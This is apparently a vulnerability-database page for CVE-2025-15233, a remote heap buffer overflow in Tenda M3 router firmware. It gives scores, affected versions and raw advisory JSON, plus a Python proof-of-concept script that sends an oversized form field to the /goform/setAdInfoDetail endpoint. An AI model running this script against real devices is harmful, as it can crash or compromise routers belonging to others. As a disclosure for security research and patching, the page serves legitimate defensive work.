Security Vulnerability Report
中文
CVE-2025-15233 CVSS 8.8 HIGH

CVE-2025-15233

Published: 2025-12-30 08:15:43
Last Modified: 2026-02-24 07:17:05
Source: [email protected]

Description

A security flaw has been discovered in Tenda M3 1.0.0.13(4903). This issue affects the function formSetAdInfoDetails of the file /goform/setAdInfoDetail. The manipulation of the argument adName/smsPassword/smsAccount/weixinAccount/weixinName/smsSignature/adRedirectUrl/adCopyRight/smsContent/adItemUID results in heap-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:m3_firmware:1.0.0.13\(4903\):*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:m3:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda M3 1.0.0.13(4903)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15233 PoC - Tenda M3 Heap Buffer Overflow This PoC demonstrates the heap buffer overflow vulnerability in Tenda M3's formSetAdInfoDetails function. Note: Use only for authorized security testing. """ import requests import argparse TARGET_HOST = "http://{target_ip}" ENDPOINT = "/goform/setAdInfoDetail" def create_exploit_payload(param_name, overflow_length=1000): """ Create a payload that triggers heap buffer overflow. The function formSetAdInfoDetails copies user input to a fixed-size heap buffer without proper length checking. """ # Generate overflow data overflow_data = "A" * overflow_length payload = { param_name: overflow_data } return payload def exploit_cve_2025_15233(target_ip, param="adName", overflow_length=1000): """ Send exploit payload to trigger the vulnerability. Args: target_ip: Target device IP address param: Parameter to overflow (adName, smsPassword, smsAccount, etc.) overflow_length: Length of overflow data """ url = f"{TARGET_HOST.format(target_ip=target_ip)}{ENDPOINT}" headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } payload = create_exploit_payload(param, overflow_length) print(f"[*] Targeting: {url}") print(f"[*] Overflow parameter: {param}") print(f"[*] Payload length: {overflow_length}") try: response = requests.post(url, data=payload, headers=headers, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-15233 PoC") parser.add_argument("target_ip", help="Target Tenda M3 IP address") parser.add_argument("-p", "--param", default="adName", help="Parameter to overflow (default: adName)") parser.add_argument("-l", "--length", type=int, default=1000, help="Overflow length (default: 1000)") args = parser.parse_args() exploit_cve_2025_15233(args.target_ip, args.param, args.length)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15233", "sourceIdentifier": "[email protected]", "published": "2025-12-30T08:15:43.300", "lastModified": "2026-02-24T07:17:05.187", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Tenda M3 1.0.0.13(4903). This issue affects the function formSetAdInfoDetails of the file /goform/setAdInfoDetail. The manipulation of the argument adName/smsPassword/smsAccount/weixinAccount/weixinName/smsSignature/adRedirectUrl/adCopyRight/smsContent/adItemUID results in heap-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-122"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:m3_firmware:1.0.0.13\\(4903\\):*:*:*:*:*:*:*", "matchCriteriaId": "7E8A3AB9-7717-427B-8C76-1A5BCF42C08E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:m3:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8543333-41FC-48B4-B14C-D763495A1017"}]}]}], "references": [{"url": "https://github.com/dwBruijn/CVEs/blob/main/Tenda/setAdInfoDetail.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338629", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338629", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.725495", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.